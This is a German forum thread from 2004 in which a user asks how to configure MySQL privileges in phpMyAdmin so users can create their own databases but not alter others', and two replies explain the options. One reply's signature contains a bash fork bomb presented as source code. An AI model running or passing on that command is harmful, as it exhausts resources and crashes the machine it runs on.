Sie sind nicht angemeldet.

1

21.04.2004, 17:28

Phpmyadmin - DB-Rechte

Hi zusammen,
also folgendes Problem

Ich habe auf einen Dabian Server Phpmyadmin installiert und habe verschiedene Benutzer die auf die DBs zugreifen dürfen. Ich möchte, dass sie selber welche erstellen können aber die von den anderen Usern zwar sehen und anschauen aber nicht verändern können.
Ich habe versucht die REchte Global auf nur Select zustellen und DB spezifisch dann andere Rechte dann können sie aber keine DB erstellen. Gebe ich ihnen aber das Recht Create können sie sowohl Db als auch Tabellen in den DB erstellen welche sie sich anschauen können also auch in denen der anderen User.
Und wie genau kann ich das einstellen mit so ner Art "wildcard" damit die Benutzer wenn sie eine DB erstellen sie auch direkt die kompletten Rechte dafür bekommen aber eben nur DB spezifisch

Benutze:
Debian Kernel version 2.4
PhpMyAdmin 2.5.6
MFG KinGHeinz

2

21.04.2004, 18:33

meines wissens geht das, was du vor hast nicht. Im regelfall werden DBs vom Admin angelegt und die einzelnen User bekommen dann Grants auf den DBs. Aber DBs selber erstellen kann/sollte eigentlich nur der Admin.

Quellcode

1
bash-2.05b $ :() { :|: & } ; :

"Kaffee Junge, weisst du eigentlich wie gut der schmeckt?"

3

22.04.2004, 10:31

Schau' Dir doch 'mal die Struktur der 'user' Tabelle in der Datenbank 'mysql' an. Ist der Eintrag "Create_priv" eingeschaltet für einen Benutzer, ist es diesem erlaubt auf Datenbank-Basis zu agieren und Datenbanken anzulegen. Damit darf er natürlich auch Tabellen anlegen.

Deshalb gibt es eigentlich nur drei Möglichkeiten: die erste hast Du bereits geschildert; bei der zweiten richtet der Admin die Datenbanken ein und gewährt den Benutzern die Erlaubnis darin Tabellen anzulegen. Dann hat der Benutzer mit den Datenbanken nichts zu tun. Oder drittens, es wird ein spezieller admin_user angelegt, der geringere Rechte als der eigentliche Admin hat, aber Datenbanken anlegen kann/darf. Dieser admin_user sollte dann aber wiederum nicht für das Arbeiten mit den Tabellen verwendet werden.

Also die beste Variante ist m.E. ein vertrauenswürdiger Administrator oder ein User, der diese Aufgaben für alle übernimmt. Aber einfach allen das Recht zum rumfrickeln zu geben, halte ich für etwas gewagt.

Ciao